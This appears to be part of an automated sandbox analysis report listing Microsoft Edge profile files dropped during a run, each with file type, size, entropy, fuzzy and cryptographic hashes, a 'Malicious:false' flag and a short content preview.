                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                  MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                  SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                  SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                  SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9817
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.118759342018169
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:stp+kdpzszksZihUkzEu8+bV+FLPQA66WmaFIMYqPwYJ:stp+Qzszkfh5bGjQx6WmaTYm
                                                                                                                                                                                                                                                                                                  MD5:5EAC6061A8BBB676B9026F257FC68693
                                                                                                                                                                                                                                                                                                  SHA1:5E3B7EECF48E91B0A9D541DAF3AF74C4606E6688
                                                                                                                                                                                                                                                                                                  SHA-256:71515700038866DE6DBD4A4A96ABBC8D08D7E65C51AC62F286E17B089F0BA820
                                                                                                                                                                                                                                                                                                  SHA-512:26647A27FA44CBFC7E518D812AA99BB6B0333B4C136DD9DBFDE5997A9B39E919C4FF1ADC4FA99CD3392723EB8C1B59411AB3F89BB75857A20DF3C4E4BA1688B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5672700036123866
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:hF/oSwWPEmfMH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVh80bErwOp8tuV:hF/oSwWPEmfMHu1jagXbd1tK
                                                                                                                                                                                                                                                                                                  MD5:5F9FCCEB924EAC3B25C6C070503B055C
                                                                                                                                                                                                                                                                                                  SHA1:7B0BF34CC947C37CA3A39AE5194611767BF0CB28
                                                                                                                                                                                                                                                                                                  SHA-256:06904C39FC9B4CC66670139BF36BA4C647D9D995A0C82DE2754D437A32499023
                                                                                                                                                                                                                                                                                                  SHA-512:339C9819F2F7CA3012B022C2857EBAD0709F6E81A5AE6EFCCA4FF06126904C09339A6EDE76B7EC3043D3D95D0F986CE48D35E5D4F1C9BA8E2C9915D293CB0DCF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                                  MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                                  SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                                  SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                                  SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):297
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.130089774255329
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4hZR1923oH+TcwtE/a252KLl34hdL9+q2P923oH+TcwtE/a2ZIFUv:BsZ8Yeb8xLpsv+v4Yeb8J2FUv
                                                                                                                                                                                                                                                                                                  MD5:FEF7D3DCD0F3961D2449591A014EAFC2
                                                                                                                                                                                                                                                                                                  SHA1:5A309B864AA838821A342468F152B11788E5D76B
                                                                                                                                                                                                                                                                                                  SHA-256:CB73C62903BD1D7C946EC17CDB1FD5C22F9F5FF22EDC3E0D931490CDD10382B8
                                                                                                                                                                                                                                                                                                  SHA-512:4602573B158788470F552D99D55F2BCF8380B4326AE09219D603E5334FED2D270A1DDA95BF95A5237337D6A65CC8FB332FDEA2C4F5E097702D77EEA2FA70D6E9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:37.415 4cc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-01:01:37.431 4cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):114579
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5783086402133115
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekP1mu:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dz
                                                                                                                                                                                                                                                                                                  MD5:06843090B3980191ECA6367BDC1627B5
                                                                                                                                                                                                                                                                                                  SHA1:EE110C87AD436420E08D87FC3F60AE3C508D651B
                                                                                                                                                                                                                                                                                                  SHA-256:FC4687FFFE00D501B502A6204B401585E61627453198341C6EE33C3CD5091171
                                                                                                                                                                                                                                                                                                  SHA-512:B9A8DFE905C1AF0DDC67D56A5E6BBD3A7662D3C16F10673F628AA6F6557023EAF6A8F5C857D9883F80115F5A6DD75A6179E2318CC86B1282B4505FBFB8CFBC32
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):189105
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.386816528737029
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:XBNzI1d4Q+wejl+JD34pL/fKdQTTCcvMJhkiHD1n/UgfL/:++we8JDiL/3/UJScJ/
                                                                                                                                                                                                                                                                                                  MD5:A1288B5E446206DE7BFB9FDE393E071E
                                                                                                                                                                                                                                                                                                  SHA1:F80E913C77ADC12F1A5226C56068BA63F00DA15F
                                                                                                                                                                                                                                                                                                  SHA-256:D17A8AEB6C98F955555E63CFD7643894356AF5F741806EA9E9E3569A5AA6EFFE
                                                                                                                                                                                                                                                                                                  SHA-512:74FCE8A1496BC486231899E206A357CDC52E4743F9F7678FF8A36D0B4598005EA0E649E11D01BF7C6EAC5B09B2DAC191BB1F50B684263050F65631E2067F6407
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.509856868205173
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:XVlXAyXl/lYV/lxEstllQvzn:TXjYWs+b
                                                                                                                                                                                                                                                                                                  MD5:76685352F16850A11CFAB41FEAE5FC8A
                                                                                                                                                                                                                                                                                                  SHA1:72A52F410DB4229C88674FE3EE838F2E8A9EF267
                                                                                                                                                                                                                                                                                                  SHA-256:B19616DD053C9870F33E133E1E3B63FA5AEF491E23677C28885F3A001B78D711
                                                                                                                                                                                                                                                                                                  SHA-512:DFE6EC6F15F05C19CF0110A9FC055B33ADA7947047A36CDB6E6EA19539EAE44E501816C39721C30B42361E4399B3A38A384CDB5AC4C24C5307E55DEA47F82849
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@..."...oy retne.........................X....,................x..z./.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):6213
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.382687648143752
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:N91sW3ZJG9Xp+vt+ViYokAsLl9iSr/1rhc8NhS+6h:Nsh9Xp+FKiYDZLl9iSr/phDu
                                                                                                                                                                                                                                                                                                  MD5:F87EC05AC71B1793F4B84F8870BFD10F
                                                                                                                                                                                                                                                                                                  SHA1:65768E7F923C99DAB55BFF2ACEB3414114F66FC6
                                                                                                                                                                                                                                                                                                  SHA-256:EF8CD663441C351ACF0D3DCCA515A9A7CC18DCEFDDC3A29875495E11CDDE43B3
                                                                                                                                                                                                                                                                                                  SHA-512:4BF96265339399A1C64645CFDB86D50549681ED721276EFF577AF9B376728604D3E00FFD2674A8956C8FF6C1FB460E2E339329D369177A0BC039A7ABAED60C58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...................b................next-map-id.1.Cnamespace-c05d450e_a561_4690_abd2_322580b9715b-https://ntp.msn.com/.0..c..................map-0-shd_sweeper.-{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.m.s.n.-.b.l.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.9.0.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.f.-.r.e.l.-.a.l.l.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.c.o.o.k.i.e.s.y.n.c.,.p.r.g.-.w.p.o.-.p.n.p.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.c.,.1.s.-.p.r.2.-.e.v.l.c.b.b.,.1.s.-.p.r.2.-.e.v.l.c.h.,.1.s.-.p.r.2.-.e.v.l.c.n.,.1.s.-.p.r.2.-.e.v.l.c.r.p.,.1.s.-.p.r.2.-.e.v.l.c.t.,.1.s.-.p.r.g.2.-.l.i.f.e.c.y.c.l.e.,.1.s.-.w.p.o.-.p.r.2.-.n.c.a.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.12027744461977
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XkJN+q2P923oH+TcwtrQMxIFUt8U4XmZmw+U4X2HNVkwO923oH+TcwtrQMFLJ:Bnav4YebCFUt8Uj/+UFz5LYebtJ
                                                                                                                                                                                                                                                                                                  MD5:48E0EB1DD7E06D7413E1050854FDA08E
                                                                                                                                                                                                                                                                                                  SHA1:2C3BC6CB18AB6795887D15EFB694FF833B4388B6
                                                                                                                                                                                                                                                                                                  SHA-256:2B233860239487FF086FC4D647F3C691526196513BB6CC626D61F8D9CBB108D6
                                                                                                                                                                                                                                                                                                  SHA-512:D456C48CC9BB1788018683F4E8C72F384EDA2DFCAB455E4B799899434D99A39979F3137B8A3F06324B63992C71A0837A6382E6B3628B5CFB3ED81B41129B4C98
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.563 1158 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:01:22.574 1158 Recovering log #3.2024/12/27-01:01:22.578 1158 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8307916091249417
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:3MH+RAIyeDgpsAF4unxCtLp3X2amEtG1ChqsRwaAHEQQKkOAM44Yb:31WIfgzFkLp2FEkChsjkhHOpp
                                                                                                                                                                                                                                                                                                  MD5:29841BE2830647BD64A6C50212CA4021
                                                                                                                                                                                                                                                                                                  SHA1:E2132F82DA9B9B6DD2BC247DA14935EDF391401A
                                                                                                                                                                                                                                                                                                  SHA-256:F2422DACF6830AA6A71729ED6E75A59FA00D7D59BEE27E29F9E56477A581769C
                                                                                                                                                                                                                                                                                                  SHA-512:67516E089C92C5E825EF2636AB281C816C14F174CDF12E1B91983685568A03508496DF7696A5F14AC18F5F4594B4CB2C27514F6E7225DCA9233E21F85AA67800
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SNSS..........f..............f......"...f..............f..........f..........f..........f....!.....f..................................f...f1..,......f$...c05d450e_a561_4690_abd2_322580b9715b......f..........f....;8............f......f..........................f....................5..0......f&...{98952893-68FF-4A5D-A164-705C709ED3DB}........f..........f.............................f..............f........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........^1:*....^1:*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):349
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.09162777913444
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xuq2P923oH+Tcwt7Uh2ghZIFUt8U4XHw9Zmw+U4XHwPkwO923oH+Tcwt7Uh2gd:BRv4YebIhHh2FUt8U6g/+U6I5LYebIh9
                                                                                                                                                                                                                                                                                                  MD5:A42CC2FB0BF137AB76F5B723352EE966
                                                                                                                                                                                                                                                                                                  SHA1:FA30B36BDF3DE013EF0630E9A0FBAAECDB830F26
                                                                                                                                                                                                                                                                                                  SHA-256:43130836A3D0EA579787BF9CFFCAB36F2A34449C14FB547BB6A1624ECA86C8DC
                                                                                                                                                                                                                                                                                                  SHA-512:18CC27BDFD93C208DB899B1901ACF5ECF947F50E811117994B43AE6D750CB6E69EB75DA753DEC8B3F6557E8A7F2FA2C0E9443225CBBB01E057F719CA198F1095
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.493 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:01:21.577 e04 Recovering log #3.2024/12/27-01:01:21.577 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.213130221366608
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X+VNAVq2P923oH+TcwtzjqEKj3K/2jMGIFUt8U4XRAgZmw+U4XfvAIkwO923od:BGv4YebvqBQFUt8Um/+UA75LYebvqBvJ
                                                                                                                                                                                                                                                                                                  MD5:52E81E338B151E6A071B640BCCF37CC9
                                                                                                                                                                                                                                                                                                  SHA1:7951BA04A65AD80388621583006670C7D853A06D
                                                                                                                                                                                                                                                                                                  SHA-256:336FBFFE96EEC521B27D7A4D2590A3A0B8ED8886F98E45F21B92C02AC99C6C56
                                                                                                                                                                                                                                                                                                  SHA-512:1F3E52BC47C352A18B7520A932AB7672CFC765BC253C1F4CBEDB3223970984522F6FB956CEA4F3A79ED4D44760603C2013AA243FF7B81E476F12CE3E8CC60472
                                                                                                                                                                                                                                                                                                  Malicious:false
